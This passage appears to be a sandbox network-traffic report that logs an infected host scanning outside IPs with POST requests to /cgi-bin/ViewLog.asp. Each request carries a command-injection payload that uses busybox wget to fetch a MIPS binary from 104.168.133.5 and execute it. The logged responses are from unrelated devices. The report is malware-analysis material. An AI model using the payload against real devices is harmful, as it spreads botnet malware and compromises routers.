20 6c 6f 67 69 6e 20 74 6f 20 73 65 65 20 74 68 69 73 20 70 61 67 65 21 3c 2f 74 68 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 64 3e 50 61 73 73 77 6f 72 64 3c 2f 74 64 3e 3c 74 64 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 36 30 22 20 77 69 64 74 68 3d 22 34 30 30 22 76 61 6c 75 65 3d 22 22 3e 3c 2f 74 64 3e 3c 74 64 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 0a 3c 74 72 3e 3c 74 64 3e 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 3e 4c 6f 67 69 6e 3c 2f 62 75 74 74 6f 6e 3e 3c 2f 74 72 3e 3c 2f 74 64 3e 0a
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN"><html><head><meta http-equiv="refresh" content=""><title>MDT Technologies GmbH - KNX-IP Interface</title><link rel="stylesheet" type="text/css" href="gft.css"/><link rel="Shortcut icon" href="img/favicon.ico" type="image/x-icon"/></head><body><div id="logo"><a href="http://www.mdt.de" ><img src="img/logo.gif" border = "0" alt="MDT Technologies GmbH" title="MDT Technologies GmbH"/></a></div><div id="header">KNX-IP Interface</div><div id="nav"><div id="navh"></div><ul><li><a href="/index.shtml">Device Info</a></li><li><a href="/knx.shtml">Prog. Mode</a></li><li><a href="/email.shtml">Email</a></li><li><a href="/ntp.shtml">Time</a></li><li><a href="/update.shtml">Firmware Update</a></li></ul></div><p align="right"></p><div id="con"> <form action="/password.cgi" method="get" autocomplete="off" accept-charset="ISO-8859-1"><table cellpadding="10"><tr><th>You have to login to see this page!</th></tr><tr><td>Password</td><td><input type="password" name="password" maxlength="60" width="400"value=""></td><td></td></tr><tr><td><button type="submit">Login</button></tr></td>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              90192.168.2.135977631.40.225.1788080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.591821909 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:25.807804108 CET1340INHTTP/1.0 400 Bad Request
                                              Server: squid/3.1.23
                                              Mime-Version: 1.0
                                              Date: Thu, 23 Nov 2023 03:46:18 GMT
                                              Content-Type: text/html
                                              Content-Length: 3167
                                              X-Squid-Error: ERR_INVALID_URL 0
                                              Connection: close
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 20 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 20 20 20 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 65 66 65 66 65 66 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 63 6f 6c 6f 72 3a 20 23 31 65 31 65 31 65 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 74 69 74 6c 65 20 61 72 65 61 20 2a 2f 0a 23 74 69 74 6c 65 73 20 7b 0a 09 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 35 70 78 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 31 30 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 75 72 6c 28 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 71 75 69 64 2d 63 61 63 68 65 2e 6f 72 67 2f 41 72 74 77 6f 72 6b 2f 53 4e 2e 70 6e 67 27 29 20 6e 6f 2d 72 65 70 65 61 74 20 6c 65 66 74 3b 0a 7d 0a 0a 2f 2a 20 69 6e 69 74 69 61 6c 20 74 69 74 6c 65 20 2a 2f 0a 23 74 69 74 6c 65 73 20 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 23 74 69 74 6c 65 73 20 68 32 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 7d 0a 0a 2f 2a 20 73 70 65 63 69 61 6c 20 65 76 65 6e 74 3a 20 46 54 50 20 73 75 63 63 65 73 73 20 70 61 67 65 20 74 69 74 6c 65 73 20 2a 2f 0a 23 74 69 74 6c 65 73 20 66 74 70 73 75 63 63 65 73 73 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 66 66 30 30 3b 0a 09 77 69 64 74 68 3a 31 30 30 25 3b 0a 7d 0a 0a 2f 2a 20 50 61 67 65 20 64 69 73 70 6c 61 79 65 64 20 62 6f 64 79 20 63 6f 6e 74 65 6e 74 20 61 72 65 61 20 2a 2f 0a 23 63 6f 6e 74 65 6e 74 20 7b 0a 09 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 66 66 66
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>ERROR: The requested URL could not be retrieved</title> <style type="text/css">... /* Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License*//* Page basics */* {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background: #efefef;font-size: 12px;color: #1e1e1e;}/* Page displayed title area */#titles {margin-left: 15px;padding: 10px;padding-left: 100px;background: url('http://www.squid-cache.org/Artwork/SN.png') no-repeat left;}/* initial title */#titles h1 {color: #000000;}#titles h2 {color: #000000;}/* special event: FTP success page titles */#titles ftpsuccess {background-color:#00ff00;width:100%;}/* Page displayed body content area */#content {padding: 10px;background: #ffffff


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              91192.168.2.133531694.122.220.2478080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.597995996 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              92192.168.2.134901294.121.187.408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.603049040 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              93192.168.2.134734694.120.46.208080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.605000019 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              94192.168.2.133527294.120.211.2048080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.612689018 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              95192.168.2.134902094.121.68.658080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.636435032 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              96192.168.2.134597662.122.172.2138080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.738153934 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              97192.168.2.134043031.136.116.2318080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.746592045 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:26.310664892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:27.430866003 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:29.830621004 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:34.438664913 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:43.398606062 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:01.062547922 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:16:37.926470041 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              98192.168.2.135990095.163.215.2438080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.785316944 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              99192.168.2.134462895.163.16.798080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:25.801556110 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:15:26.011106968 CET464INHTTP/1.1 401 Unauthorized
                                              Server: nginx/1.10.2
                                              Date: Thu, 23 Nov 2023 04:15:25 GMT
                                              Content-Type: text/html
                                              Content-Length: 195
                                              Connection: keep-alive
                                              WWW-Authenticate: Basic realm="closed area"
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 31 20 41 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>401 Authorization Required</title></head><body bgcolor="white"><center><h1>401 Authorization Required</h1></center><hr><center>nginx/1.10.2</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              100192.168.2.134496294.124.193.238080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:15:29.280400991 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
